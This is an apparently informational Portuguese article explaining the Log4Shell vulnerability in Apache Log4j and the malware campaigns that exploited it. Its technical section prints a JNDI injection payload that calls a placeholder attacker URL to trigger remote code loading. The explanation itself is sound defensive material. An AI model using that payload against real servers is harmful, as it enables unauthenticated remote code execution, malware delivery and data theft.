Vulnerabilidade Log4Shell

Em 10 de dezembro de 2021, uma exploração para uma vulnerabilidade crítica na plataforma de registro baseada no Java Apache Log4j foi lançada publicamente. Rastreada como CVE-2021-44228 ou Log4Shell, a vulnerabilidade afeta as versões Log4j do Log4j 2.0-beta9 até a 2.14.1. Os agentes da ameaça podem tirar proveito da exploração para estabelecer acesso remoto não autenticado, executar código, entregar ameaças de malware ou coletar informações. A vulnerabilidade é atribuída a um status crítico, pois o Log4j é amplamente usado por aplicativos corporativos e serviços na Nuvem.

Detalhes Técnicos do Log4Shell

A exploração começa com o agente da ameaça alterando o agente do usuário do navegador da Web. Em seguida, eles visitam um site ou procuram uma string específica presente em sites com o formato:

${jndi:ldap://[attacker_URL]}

Como resultado, a string será adicionada aos logs de acesso do servidor da Web. Os invasores então esperam que o aplicativo Log4j analise esses logs e alcance a string anexada. Nesse caso, o bug será disparado, fazendo com que o servidor faça um retorno de chamada para a URL presente na string JNDI. Essa URL é abusada para lidar com comandos codificados no Base64 ou classes Java posteriormente e executá-los no dispositivo comprometido.

O Apache lançou rapidamente uma nova versão - Log4j 2.15.0, para resolver e corrigir o exploit, mas uma quantidade significativa de sistemas vulneráveis pode permanecer sem serem corrigidas por um longo período. Ao mesmo tempo, os autores da ameaça rapidamente perceberam a vulnerabilidade de dia zero do Log4Shell e começaram a fazer digitalizações em busca de servidores adequados para explorar. A comunidade infosec rastreou inúmeras campanhas de ataque empregando o Log4Shell para entregar uma ampla gama de ameaças de malware.

O Log4Shell é Usado em Ataques de Mineração de Moeda Digital, Botnet, Backdoor e de Coleta de Dados

Um dos primeiros agentes de ameaça a implementar o Log4Shell em suas operações foram os cibercriminosos por trás do botnet de mineração de moeda digital Kinsing. Os hackers usaram o Log4Shell para entregar cargas úteis codificadas no Base64 e executar scripts de shell. A função desses scripts é limpar o sistema visado das ameaças concorrentes de mineração de moeda digital antes que seu próprio malware Kinsing seja executado.

O Netlab 360 detectou autores de ameaças usando a vulnerabilidade para instalar versões dos botnets Mirai e Muhstik nos dispositivos violados. Essas ameaças de malware são projetadas para adicionar sistemas infectados a uma rede de dispositivos e servidores IoT, que os invasores podem instruir a lançar ataques de DDoS (Negação de Serviço Distribuída) ou implantar moedas digitais subseqüentemente.

De acordo com o Centro de Inteligência de Ameaças da Microsoft, o exploit Log4j também foi alvo de campanhas de ataque derrubando beacons do Cobalt Strike. O Cobalt Strike é uma ferramenta de software legítima usada para testes de penetração nos sistemas de segurança de uma empresa.No entanto, seus recursos de backdoor o tornaram uma parte comum do arsenal de vários grupos de autores de ameaças. Posteriormente, o acesso backdoor ilegal à rede da vítima é usado para entregar cargas úteis de próximo estágio, tais como ransomware, ladrões de informações e outras ameaças de malware.

O Log4Shell pode ser explorado para adquirir variáveis de ambiente contendo dados de servidor. Dessa forma, os invasores podem obter acesso ao nome do host, nome do SO, número da versão do SO, nome de usuário sob o qual o serviço Log4j está sendo executado e muito mais.